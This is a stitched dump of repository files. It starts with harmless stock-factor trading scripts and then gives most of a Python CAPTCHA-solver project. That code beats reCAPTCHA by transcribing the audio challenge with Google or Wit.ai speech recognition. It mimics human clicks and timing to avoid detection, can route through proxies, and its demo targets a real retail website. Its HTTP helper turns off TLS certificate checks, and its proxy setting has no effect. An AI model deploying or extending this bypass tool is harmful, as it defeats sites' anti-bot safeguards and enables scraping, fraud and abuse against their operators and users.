np.cumsum(pnls)\n#data = pd.read_csv(\"./data/000905.csv\", index_col=0)\nplt.plot(cum_pnls)\n#plt.plot(data.CLOSE)\nplt.show()\n"
},
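A tiny worked example of the two mark-to-market legs computed above, with made-up prices: on the entry day PnL is open-to-close on a lot sized from `capital / open` (the `transactionMTMDailyPnl` / `priorperiodMTMDailyPnl_1` logic), and on later holding days it is close-to-close on the same lot (`priorperiodMTMDailyPnl_2`).

```python
capital = 10000

# Entry day: buy at the open, mark at the close.
open_0, close_0 = 10.0, 10.5
lot = capital / open_0                 # 1000 shares
pnl_day0 = (close_0 - open_0) * lot    # +500.0

# Next holding day: PnL is measured close-to-close on the same lot.
close_1 = 10.2
pnl_day1 = (close_1 - close_0) * lot   # -300.0

print(pnl_day0, pnl_day1, pnl_day0 + pnl_day1)  # 500.0 -300.0 200.0
```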
{
"alpha_fraction": 0.5861513614654541,
"alphanum_fraction": 0.6380032300949097,
"avg_line_length": 25.31355857849121,
"blob_id": "b13735004e700f0e17bdcd99c87342c5ca6b4377",
"content_id": "f9adc28493c17e19e2401900e5bde7c2923284d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3105,
"license_type": "no_license",
"max_line_length": 219,
"num_lines": 118,
"path": "/factor.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nalpha 191 factors\n\"\"\"\n\nfrom math import log\nimport scipy.stats as stats\nfrom datetime import datetime\n\n\"\"\"\nlatest updated data insert to front\n\"\"\"\nVOLUME = [1,2,5,7,5,4,8]\nCLOSE = [5,6,8,4,5,6,7]\nOPEN = [4,8,4,5,4,4,5]\nHIGH = [6,9,9,6,6,7,8]\nLOW = [4,5,4,4,4,3,4]\nVWAP = [4,5,4,4,4,3,4]\n\ndef getListOpen(OPEN, n):\n return OPEN[:n]\n\ndef getOpen(OPEN,n):\n return OPEN[n]\n\ndef getListHigh(HIGH, n):\n return HIGH[:n]\n\ndef getHigh(HIGH,n):\n return HIGH[n]\n\ndef getListLow(LOW, n):\n return LOW[:n]\n\ndef getLow(LOW,n):\n return LOW[n]\n\ndef getVwap(VWAP, n):\n return VWAP[n]\n\ndef getListClose(CLOSE, n):\n return CLOSE[:n]\n\ndef getClose(CLOSE,n):\n return CLOSE[n]\n \ndef getListVolume(VOLUME, n):\n return VOLUME[:n]\n\ndef getVolume(VOLUME, n):\n return VOLUME[n]\n\ndef getDelay(A, n):\n return A[n]\n\ndef getListAdd(A, B):\n \"\"\"\n list A + list B\n \"\"\"\n return list(map(lambda x: x[0]+x[1], zip(A, B)))\n\ndef getSum(A, n):\n \"\"\"\n sum of last n days\n \"\"\"\n if A.empty():\n return 0\n else:\n return sum(A[:n])\n\ndef getListSub(A, B):\n return list(map(lambda x: x[0]-x[1], zip(A, B)))\n \ndef getListDiv(A, B):\n return list(map(lambda x: x[0]/x[1], zip(A, B)))\n\ndef getListLog(A):\n\treturn [log(x, 10) for x in A]\n\ndef getListRank(A):\n A.sort()\n return A\n \ndef getListDelta(A, n):\n # TODO\n if len(A) == 2:\n return A[1]-A[0]\n else:\n return [A[m]-A[m-n] for m in range(1,len(A))]\n\ndef getListCorr(A, B, n):\n value = stats.pearsonr(A,B)\n return value[0]\n\ndef updateFactors(data):\n return data\n\nalpha_1 = (-1 * getListCorr(getListRank(getListDelta(getListLog(getListVolume(VOLUME,7)), 1)), getListRank(getListDiv(getListSub(getListClose(CLOSE,6), getListOpen(OPEN,6)), getListOpen(OPEN,6))), 6))\nalpha_2 = (-1 * getListDelta(getListDiv(getListSub(getListSub(getListClose(CLOSE, 2), getListLow(LOW,2)), getListSub(getListHigh(HIGH,2), getListClose(CLOSE,2))), getListSub(getListHigh(HIGH,2), getListLow(LOW,2))), 1))\n\nalpha_3=0\nfor i in range(6):\n alpha_3 += (0 if getClose(CLOSE,i)==getDelay(CLOSE,i+1) else getClose(CLOSE,i)-(min(getLow(LOW,i),getDelay(CLOSE,i+1)) if getClose(CLOSE,i)>getDelay(CLOSE,i+1) else max(getHigh(HIGH,i),getDelay(CLOSE,i+1))))\nalpha_13 = (((getHigh(HIGH,0) * getLow(LOW,0))**0.5) - getVwap(VWAP,0))\nalpha_14 = getClose(CLOSE,0)-getDelay(CLOSE,5)\nalpha_15 = getOpen(OPEN,0)/getDelay(CLOSE,1)-1\n#alpha_17 = getListRank((VWAP - MAX(VWAP, 15)))^DELTA(CLOSE, 5) #TODO\nalpha_18 = getClose(CLOSE,0)/getDelay(CLOSE,5) \nalpha_19 = ((getClose(CLOSE,0)-getDelay(CLOSE,5))/getDelay(CLOSE,5) if getClose(CLOSE,0)<getDelay(CLOSE,5) else ((0 if getClose(CLOSE,0)==getDelay(CLOSE,5) else (getClose(CLOSE,0)-getDelay(CLOSE,5))/getClose(CLOSE,0))))\nalpha_20 = (getClose(CLOSE,0)-getDelay(CLOSE,6))/getDelay(CLOSE,6)*100\nprint (\"alpha_1: \", alpha_1)\nprint (\"alpha_2: \", alpha_2)\nprint (\"alpha_3: \", alpha_3)\nprint (\"alpha_13: \", alpha_13)\nprint (\"alpha_14: \", alpha_14)\nprint (\"alpha_15: \", alpha_15)\nprint (\"alpha_18: \", alpha_18)\nprint (\"alpha_19: \", alpha_19)\nprint (\"alpha_20: \", alpha_20)\n"
},
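The list helpers above re-implement operations pandas ships with. As a sketch, alpha_14 (`CLOSE - DELAY(CLOSE, 5)`) and alpha_20 computed over a whole series with `shift`; note the series below is ordered oldest-first, the reverse of the newest-first lists in the module.

```python
import pandas as pd

# Same CLOSE values as above, reversed into chronological (oldest-first) order.
close = pd.Series([7, 6, 5, 4, 8, 6, 5])

alpha_14 = close - close.shift(5)                          # CLOSE - DELAY(CLOSE, 5)
alpha_20 = (close - close.shift(6)) / close.shift(6) * 100

print(alpha_14.iloc[-1])  # -1.0, matches getClose(CLOSE,0) - getDelay(CLOSE,5)
print(alpha_20.iloc[-1])  # -28.57..., matches the scalar alpha_20 above
```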
{
"alpha_fraction": 0.6459909081459045,
"alphanum_fraction": 0.6737266778945923,
"avg_line_length": 26.943662643432617,
"blob_id": "147d13ff36c06458d947cc51c16590d6a1264198",
"content_id": "bd2a4ec616f24cb8eb65d37ac451371d87a2b0ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 71,
"path": "/gData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nget data\n\"\"\"\nimport os\nimport re\nimport csv\nimport time\nimport pandas as pd\n# import tushare as ts\n\ndef atoi(text):\n return int(text) if text.isdigit() else text\n\ndef naturalKeys(text):\n '''\n alist.sort(key=natural_keys) sorts in human order\n http://nedbatchelder.com/blog/200712/human_sorting.html\n (See Toothy's implementation in the comments)\n '''\n return [ atoi(c) for c in re.split('(\\d+)', text) ]\n\ndef getData():\n\tdata = pd.read_csv('./data/zz500.csv', encoding='cp1252')\n\tsymbol_list = data['code'].tolist()\n\tsymbol_list.sort()\n\t#symbol_list.sort(key=naturalKeys)\n\t\n\tpanel_data = {}\n\tfor symbol in symbol_list:\n\t\thistory_data = ts.get_h_data(str(symbol).zfill(6), \"2009-01-01\", \"2018-06-30\")\n\t\thistory_data.to_csv('./data/symbol/'+str(symbol).zfill(6)+'.csv')\n\t\ttime.sleep(120)\n\t\t#history_data = pd.read_csv('./data/symbol/'+str(symbol).zfill(6)+'.csv', encoding='cp1252')\n\t\t#history_data.set_index('date', inplace=True)\n\t\t#panel_data[str(symbol).zfill(6)] = history_data\t\n\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'major', 'items')\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\t#print (panel_data.items)\n\treturn panel_data\n\ndef getDataUpdate(date):\n\tdata = []\n\tpath = \"./alpha191/date/origin/\"\n\tfile = \"alpha191_\" + date + '.csv'\n\tdata = pd.read_csv(path + file, index_col=0)\n\treturn data\n\ndef getAlphaData():\n\tpanel_data = {}\n\tpath = \"./alpha191/date/origin/\"\n\tfor file in os.listdir(path):\n\t\tdata = pd.read_csv(path + file, index_col=0)\n\t\tpanel_data[file[9:-4]] = data\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'items', 'major')\n\t#print (panel_data.items)\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\treturn panel_data\n\n#getAlphaData()\n\"\"\"\npanel_data = getData()\ndate_list = panel_data.major_axis.astype(str)\ncounter=0\nfor date in panel_data.major_axis:\n\tprint (panel_data.major_xs(date))\n\t#panel_data.major_xs(date).to_csv('./data/date/'+date_list[counter]+'.csv')\n\tcounter += 1\n\"\"\""
},
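These scripts build `pd.Panel` objects, which pandas deprecated in 0.20 and removed in 0.25. A sketch of the usual replacement, stacking per-symbol frames under a (symbol, date) MultiIndex, with made-up data:

```python
import pandas as pd

frames = {
    "000001": pd.DataFrame({"CLOSE": [10.0, 10.5]}, index=["2018-07-16", "2018-07-17"]),
    "000002": pd.DataFrame({"CLOSE": [20.0, 19.5]}, index=["2018-07-16", "2018-07-17"]),
}

# The dict keys become the outer level of the MultiIndex.
data = pd.concat(frames, names=["symbol", "date"])

print(data.loc["000001"])                   # all dates for one symbol
print(data.xs("2018-07-17", level="date"))  # one date across symbols
```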
{
"alpha_fraction": 0.5797649621963501,
"alphanum_fraction": 0.5974905490875244,
"avg_line_length": 26.899999618530273,
"blob_id": "1cf24f1e3c6542fd966c827f52421d5f555f8516",
"content_id": "cc4b70ebcfca857f4618001ff5194f93c0f7f9db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5021,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 180,
"path": "/pData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nprocess data\n\"\"\"\n\nimport csv\nimport math\nfrom gData import *\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\ndef readData():\n \"\"\"\n read all data from file \n \"\"\"\n panel_data = getAlphaData()\n #panel_data = panel_data.transpose('minor', 'major', 'items')\n return panel_data\n #return pd.read_csv(\"data.csv\")\n \ndef readDataUpdate(date):\n \"\"\"\n read today data from file\n \"\"\"\n data = getDataUpdate(date)\n return data\n \ndef cleanData(data):\n \"\"\"\n data wrapper\n \"\"\"\n # delete too much missing data rows\n #data = data.dropna(1)\n #data.dropna(thresh=4, inplace=True)\n #data = data.dropna(subset=['factor_1']) \n \n # fillna\n #data['factor_1'] = data.groupby('industry').transform(lambda x: x.fillna(x.mean()))\n #data['factor_1'] = data.groupby('industry').transform(lambda x: x.fillna(x.median()))\n #data['factor_2'] = data.groupby('industry').transform(lambda x: x.fillna(x.mean()))\n #data['factor_2'] = data.groupby('industry').transform(lambda x: x.fillna(x.median()))\n return data\n\ndef updateData(data):\n \n return data\n \ndef normalizeByIndustry(data):\n \"\"\"\n data normalization by industry\n \"\"\"\n data[\"factor\"] = (data.groupby('industry')['factor'].transform(lambda x: x/x.sum()))\n return data\n\ndef normalizationStandard(data):\n \"\"\"\n data normalization\n \"\"\"\n # standard\n data = data.apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x)))\n return data\n\ndef normalizationZscore(data):\n \"\"\"\n data normalization\n \"\"\"\n # Z-score\n data = data.apply(lambda x: (x - np.average(x)) / np.std(x))\n return data\n\ndef equalWeight(panel_data):\n \"\"\"\n calculate all trading days equal weight\n \"\"\"\n path = './alpha191/date/normal_ew/'\n for date in panel_data.major_axis:\n data = panel_data.major_xs(date)\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n data.to_csv(path+date+'.csv')\n \ndef equalWeightUpdate(date, data):\n \"\"\"\n calculate one trading day equal weight\n \"\"\"\n path = './alpha191/date/normal_ew/'\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n file = date+'.csv'\n data.to_csv(path + file)\n \ndef selfWeight(panel_data):\n path = './alpha191/date/normal_sw/'\n for date in panel_data.major_axis:\n data = panel_data.major_xs(date)\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n \n data.loc['Row_sum'] = data.loc['Row_sum']/data.iat[-1,-1]\n sum = 0.0\n for i in range(len(data.Col_sum)-1):\n for j in range(191):\n if not (math.isnan(data.iat[i,j]) or math.isnan(data.iat[-1,j])):\n sum += data.iat[i,j] * data.iat[-1,j]\n data.Col_sum[i] = sum * 100.0\n sum = 0.0\n data.to_csv(path+date+'.csv')\n \ndef selfWeightUpdate(date, data):\n \"\"\"\n calculate one trading day equal weight\n \"\"\"\n path = './alpha191/date/normal_sw/'\n data = normalizationStandard(data)\n data.loc['Row_sum'] = data.apply(lambda x: x.sum())\n data['Col_sum'] = data.apply(lambda x: x.sum(), axis=1)\n \n data.loc['Row_sum'] = data.loc['Row_sum']/data.iat[-1,-1]\n sum = 0.0\n for i in range(len(data.Col_sum)-1):\n for j in range(191):\n if not (math.isnan(data.iat[i,j]) or math.isnan(data.iat[-1,j])):\n sum += data.iat[i,j] * data.iat[-1,j]\n data.Col_sum[i] = sum * 100.0\n sum = 0.0\n file = 
date+'.csv'\n data.to_csv(path + file)\n\ndef rank(path_nor, path_rank):\n \"\"\"\n data rank\n \"\"\"\n for file in os.listdir(path_nor):\n data = pd.read_csv(path_nor + file, index_col=0)\n data.sort_values(\"Col_sum\",inplace=True)\n data.to_csv(path_rank + file)\n \ndef rankUpdate(date, path_nor, path_rank):\n \"\"\"\n data rank\n \"\"\"\n file = date + \".csv\"\n data = pd.read_csv(path_nor + file, index_col=0)\n data.sort_values(\"Col_sum\",inplace=True)\n data.to_csv(path_rank + file)\n\n\"\"\"\n# get origin from jointquant\npanel_data = readData()\n\nequalWeight(panel_data)\npath_nor = \"./alpha191/date/normal_ew/\"\npath_rank = \"./alpha191/date/rank_ew/\"\nrank(path_nor, path_rank)\n\nselfWeight(panel_data)\npath_nor = \"./alpha191/date/normal_sw/\"\npath_rank = \"./alpha191/date/rank_sw/\"\nrank(path_nor, path_rank)\n\"\"\"\n\n\n# update date data\ndate = \"2018-07-17\"\ndata = readDataUpdate(date)\n\nequalWeightUpdate(date, data)\npath_nor = \"./alpha191/date/normal_ew/\"\npath_rank = \"./alpha191/date/rank_ew/\"\nrankUpdate(date, path_nor, path_rank)\n\n\"\"\"\nselfWeightUpdate(date, data)\npath_nor = \"./alpha191/date/normal_sw/\"\npath_rank = \"./alpha191/date/rank_sw/\"\nrankUpdate(date, path_nor, path_rank)\n\"\"\""
},
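A side-by-side sketch of the two column-wise normalizations defined above on a toy frame; min-max squeezes each column into [0, 1], while the z-score centers each column at mean 0 with unit standard deviation.

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({"f1": [1.0, 2.0, 3.0], "f2": [10.0, 20.0, 40.0]})

minmax = df.apply(lambda x: (x - np.min(x)) / (np.max(x) - np.min(x)))
zscore = df.apply(lambda x: (x - np.average(x)) / np.std(x))

print(minmax)  # f1 -> [0.0, 0.5, 1.0]; f2 -> [0.0, 0.333..., 1.0]
print(zscore)  # each column now has mean 0 and std 1
```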
{
"alpha_fraction": 0.3918918967247009,
"alphanum_fraction": 0.7432432174682617,
"avg_line_length": 24,
"blob_id": "41834c07008fc9dc98b5a59e66a819550aedc964",
"content_id": "a3ec189033adf0b4e691a10192a08a6983f658ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 3,
"path": "/dzh/README.txt",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "capital = 400,000,000\nrolling capital = 200,000,000\nper stock = 10,000,000"
},
{
"alpha_fraction": 0.6770691871643066,
"alphanum_fraction": 0.6933514475822449,
"avg_line_length": 22.80645179748535,
"blob_id": "13f0045462deaef2540b5f82eb0cb962e86bc2de",
"content_id": "1a44f5244a47b192932b0251a044b48fc26fec67",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 737,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 31,
"path": "/rData.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "\"\"\"\nread csv file to panel data\n\"\"\"\nimport os\nimport csv\nimport pandas as pd\n\npath = \"./data/zz500/\"\ndef readData(path):\n\tpanel_data = {}\n\tfor file in os.listdir(path):\n\t\tdata = pd.read_csv(path + file, index_col=0)\n\t\tpanel_data[file[:-4]] = data\n\tpanel_data = pd.Panel(panel_data).transpose('minor', 'items', 'major')\n\t#print (panel_data.items)\n\t#print (panel_data.major_axis)\n\t#print (panel_data.minor_axis)\n\t#data = panel_data.major_xs(\"000006\")\n\t#print (data.CLOSE[0])\n\treturn panel_data\n\n#readData(path)\n\"\"\"\nfor symbol in panel_data.major_axis:\n\tprint (symbol)\nprint (panel_data.major_axis)\nprint (panel_data.minor_axis)\nprint (panel_data.items)\n#panel_data = cleanData(panel_data)\n#date_list = panel_data.major_axis.astype(str)\n\"\"\""
},
{
"alpha_fraction": 0.4682634770870209,
"alphanum_fraction": 0.4958083927631378,
"avg_line_length": 26.866666793823242,
"blob_id": "ded342b89432ff6636b07a43c51d42553a49b802",
"content_id": "5c78dbd4319116852ee18712ebac8d01d2bb9ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 30,
"path": "/dzh.py",
"repo_name": "jiajunxiong/astock",
"src_encoding": "UTF-8",
"text": "import csv\nimport openpyxl\nfrom datetime import datetime\n\nwb = openpyxl.load_workbook(\"zz500_1.xlsx\")\nsheets = wb.get_sheet_names()\n\nfor sheet in sheets:\n print (sheet)\n \"\"\"\n ws = wb.get_sheet_by_name(sheet)\n name = ws['A1'].value\n print (name)\n ws['A2'].value = \"DATE\"\n ws['A3'].value = datetime(2018, 1, 2)\n \n path = \"./zz500/\"\n with open(path+name[:-3]+'.csv', 'w', newline=\"\") as f: \n counter_row = 0\n c = csv.writer(f)\n for r in ws.rows:\n if counter_row != 0:\n cell_list = [cell.value for cell in r]\n if counter_row == 1: \n c.writerow(cell_list)\n else:\n cell_list[0] = cell_list[0].strftime(\"%Y-%m-%d\")\n c.writerow(cell_list)\n counter_row += 1\n \"\"\""
}
] | 7 |
e2pluginss/Pypuppeteer_Captcha_Solver
|
https://github.com/e2pluginss/Pypuppeteer_Captcha_Solver
|
0650730fc5547dab4d516ea988bdedc15202f6dd
|
af94b94c309de3c0d7dfa8a4657a7e05a79bd496
|
f78539e43eefef0be0ceef0bd2edab9b4bf5f174
|
refs/heads/master
| 2023-04-07T22:53:00.189023 | 2021-04-21T08:23:13 | 2021-04-21T08:23:13 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6364889740943909,
"alphanum_fraction": 0.6479779481887817,
"avg_line_length": 35.88135528564453,
"blob_id": "f73c324853745c48e9f421abd27bed38c386a3ca",
"content_id": "da44d4e220bbbf7491795dfa95a34ef8634a08d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2176,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 59,
"path": "/captcha_solver/speech.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Speech module. Text-to-speech classes - Sphinx, Google, WitAI, Amazon, and Azure. \"\"\"\nimport logging\nimport speech_recognition as sr\nfrom pydub import AudioSegment\nfrom captcha_solver.base import settings\n\n\nasync def mp3_to_wav(mp3_filename):\n \"\"\"Convert mp3 to wav\"\"\"\n wav_filename = mp3_filename.replace(\".mp3\", \".wav\")\n segment = AudioSegment.from_mp3(mp3_filename)\n sound = segment.set_channels(1).set_frame_rate(16000)\n garbage = len(sound) / 3.1\n sound = sound[+garbage:len(sound) - garbage]\n sound.export(wav_filename, format=\"wav\")\n return wav_filename\n\nclass Google(object):\n async def get_text(self, mp3_filename):\n wav_filename = await mp3_to_wav(mp3_filename)\n \n recognizer = sr.Recognizer()\n with sr.AudioFile(wav_filename) as source:\n audio = recognizer.record(source) \n # recognize speech using Google Speech Recognition\n audio_output = None\n try:\n audio_output = recognizer.recognize_google(audio)\n print(\"Google Speech Recognition: \" + audio_output)\n except sr.UnknownValueError:\n logging.warning(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n logging.warning(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n return audio_output\n\n \nclass WitAI(object):\n API_KEY = settings[\"speech\"][\"wit.ai\"][\"secret_key\"]\n\n async def get_text(self, mp3_filename):\n wav_filename = await mp3_to_wav(mp3_filename)\n \n recognizer = sr.Recognizer()\n with sr.AudioFile(wav_filename) as source:\n audio = recognizer.record(source) \n\n audio_output = None\n try:\n audio_output = recognizer.recognize_wit(audio, key=self.API_KEY)\n print(\"Wit.AI Recognition: \" + audio_output)\n except sr.UnknownValueError: \n logging.warning(\"Wit.ai could not understand audio\")\n except sr.RequestError as e:\n logging.warning(\"Could not request results from Wit.ia; {0}\".format(e))\n\n return audio_output\n"
},
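The `garbage = len(sound) / 3.1` trim in `mp3_to_wav` above keeps just a middle slice of the clip (dropping lead-in and trailing noise). A worked sketch of the arithmetic, remembering that pydub measures lengths in milliseconds; the 31-second clip length is an assumed example.

```python
length_ms = 31_000                 # assume a 31 s clip after conversion
garbage = length_ms / 3.1          # 10_000 ms cut from each end
kept_ms = length_ms - 2 * garbage  # 11_000 ms of audio survives the trim

print(garbage, kept_ms)  # 10000.0 11000.0
```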
{
"alpha_fraction": 0.6852226853370667,
"alphanum_fraction": 0.6872469782829285,
"avg_line_length": 21.976743698120117,
"blob_id": "e01b975d36460a287a2f6acf97de31f36708b94d",
"content_id": "955434cb20b7973fa0185a203fdf41b8511b681e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 988,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 43,
"path": "/captcha_solver/exceptions.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Exceptions used in library. \"\"\"\n\n\nclass captcha_solverError(Exception):\n \"\"\" captcha_solver base exception. \"\"\"\n\n\nclass SafePassage(captcha_solverError):\n \"\"\" Raised when all checks have passed. Such as being detected or try again. \"\"\"\n pass\n\n\nclass ResolveMoreLater(captcha_solverError):\n \"\"\" Raised when audio deciphering is incorrect and we can try again. \"\"\"\n pass\n\n\nclass TryAgain(captcha_solverError):\n \"\"\" Raised when audio deciphering is incorrect and we can try again. \"\"\"\n pass\n\n\nclass ReloadError(captcha_solverError):\n \"\"\" Raised when audio file doesn't reload to a new one. \"\"\"\n pass\n\n\nclass DownloadError(captcha_solverError):\n \"\"\" Raised when downloading the audio file errors. \"\"\"\n pass\n\n\nclass ButtonError(captcha_solverError):\n \"\"\" Raised when a button doesn't appear. \"\"\"\n pass\n\n\nclass IframeError(captcha_solverError):\n \"\"\" Raised when defacing page times out. \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6750448942184448,
"alphanum_fraction": 0.6876122355461121,
"avg_line_length": 29.94444465637207,
"blob_id": "97b9c847ac607f513665d9a2bb1c70022c78348c",
"content_id": "f51c1d4e49f046cd9936aa2ee11fbe33c388fbe4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 18,
"path": "/demo.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "from captcha_solver.solver import Solver\n\npageurl = \"https://www.rackroomshoes.com/\"\n\nproxy = \"http://127.0.0.1\"\nauth_details = {\"username\": \"proxy_username\", \"password\": \"proxy_password\"}\nargs = [\"--timeout 5\"]\noptions = {\"ignoreHTTPSErrors\": True, \"args\": args} \nclient = Solver(\n # With Proxy\n # pageurl, lang='en-US', options=options, proxy=proxy, proxy_auth=auth_details\n # Without Proxy\n pageurl, lang='en-US', options=options, retain_source=False\n)\n\nsolution = client.loop.run_until_complete(client.start())\nif solution:\n print(solution)\n"
},
{
"alpha_fraction": 0.605614960193634,
"alphanum_fraction": 0.6194295883178711,
"avg_line_length": 29.33783721923828,
"blob_id": "0b798cb27ae6e8ad5d9af2c08ad5d3d62ac94654",
"content_id": "a701d04d21e80f0f61aeaa34ed35f248d8c52ab5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 74,
"path": "/captcha_solver/util.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Utility functions. \"\"\"\nimport asyncio\nimport aiofiles\nimport requests\nfrom pyppeteer.chromium_downloader import *\nfrom requests.auth import HTTPProxyAuth\n\n\n__all__ = [\n 'get_event_loop',\n \"save_file\",\n \"load_file\",\n \"get_page\",\n]\n\nNO_PROGRESS_BAR = os.environ.get('PYPPETEER_NO_PROGRESS_BAR', '')\nif NO_PROGRESS_BAR.lower() in ('1', 'true'):\n NO_PROGRESS_BAR = True # type: ignore\n\nwin_postf = \"win\" if int(REVISION) > 591479 else \"win32\"\ndownloadURLs.update({\n 'win32': f'{BASE_URL}/Win/{REVISION}/chrome-{win_postf}.zip',\n 'win64': f'{BASE_URL}/Win_x64/{REVISION}/chrome-{win_postf}.zip',\n})\nchromiumExecutable.update({\n 'win32': DOWNLOADS_FOLDER / REVISION / f'chrome-{win_postf}' / 'chrome.exe',\n 'win64': DOWNLOADS_FOLDER / REVISION / f'chrome-{win_postf}' / 'chrome.exe',\n})\n\n\ndef get_event_loop():\n \"\"\"Get loop of asyncio\"\"\"\n if sys.platform == \"win32\":\n return asyncio.ProactorEventLoop()\n return asyncio.new_event_loop()\n\n\nasync def save_file(file, data, binary=False):\n \"\"\"Save data on file\"\"\"\n mode = \"w\" if not binary else \"wb\"\n async with aiofiles.open(file, mode=mode) as f:\n await f.write(data)\n\n\nasync def load_file(file, binary=False):\n \"\"\"Load data on file\"\"\"\n mode = \"r\" if not binary else \"rb\"\n async with aiofiles.open(file, mode=mode) as f:\n return await f.read()\n\n\nasync def get_page(url, proxy=None, proxy_auth=None, binary=False, verify=False, timeout=300):\n \"\"\"Get data of the page (File binary of Response text)\"\"\"\n urllib3.disable_warnings()\n proxies = None\n auth = None\n if proxy and proxy_auth:\n proxies = {\"http\": proxy, \"https\": proxy}\n auth = HTTPProxyAuth(proxy_auth['username'], proxy_auth['password'])\n retry = 3 # Retry 3 times\n while retry > 0:\n try:\n with requests.Session() as session:\n session.proxy = proxies\n session.auth = auth\n response = session.get(url, verify=verify, timeout=timeout)\n if binary:\n return response.content\n return response.text\n except requests.exceptions.ConnectionError:\n retry -= 1"
},
{
"alpha_fraction": 0.5727755427360535,
"alphanum_fraction": 0.5775564312934875,
"avg_line_length": 39.697296142578125,
"blob_id": "12daa3b2bfe7764bc81cc39946f9379f5756a00d",
"content_id": "f779a7c5e3f89effd704c7dcd633eaf24448b047",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7530,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 185,
"path": "/captcha_solver/audio.py",
"repo_name": "e2pluginss/Pypuppeteer_Captcha_Solver",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\" Audio solving module. \"\"\"\nimport asyncio\nimport os\nimport random\nimport shutil\nimport tempfile\nfrom asyncio import TimeoutError, CancelledError\n\nfrom aiohttp.client_exceptions import ClientError\n\nfrom captcha_solver import util\nfrom captcha_solver.base import Base\nfrom captcha_solver.exceptions import DownloadError, ReloadError, TryAgain, ButtonError, SafePassage, ResolveMoreLater\nfrom captcha_solver.speech import Google, WitAI\n\n\nclass SolveAudio(Base):\n def __init__(self, page, image_frame, loop=None, proxy=None, proxy_auth=None, lang='en-US', options=None,\n chromePath=None, **kwargs):\n self.page = page\n self.image_frame = image_frame\n self.service = self.speech_service.lower()\n\n super(SolveAudio, self).__init__(loop=loop, proxy=proxy, proxy_auth=proxy_auth, language=lang, options=options,\n chromePath=chromePath, **kwargs)\n\n async def solve_by_audio(self):\n \"\"\"Go through procedures to solve audio\"\"\"\n self.log('Wait for Audio Buttom ...')\n await self.loop.create_task(self.wait_for_audio_button())\n self.log('Click random images ...')\n for _ in range(int(random.uniform(2, 5))):\n await asyncio.sleep(random.uniform(0.2, 0.5)) # Wait 2-5 ms\n await self.click_tile() # Click random images\n await asyncio.sleep(random.uniform(1.5, 3.5)) # Wait 1-3 seg\n await self.click_verify() # Click Verify button\n self.log('Clicking Audio Buttom ...')\n await asyncio.sleep(random.uniform(1, 3)) # Wait 1-3 sec\n result = await self.click_audio_button() # Click audio button\n if isinstance(result, dict):\n if result[\"status\"] == \"detected\": # Verify if detected\n return result\n # Start process\n await self.get_frames()\n answer = None\n # Start url for ...\n start_url = self.page.url\n for _ in range(8):\n try:\n answer = await self.loop.create_task(self.get_audio_response())\n temp = self.service\n self.service = self.speech_secondary_service.lower() # Secondary Recognition\n self.speech_secondary_service = temp\n except TryAgain:\n 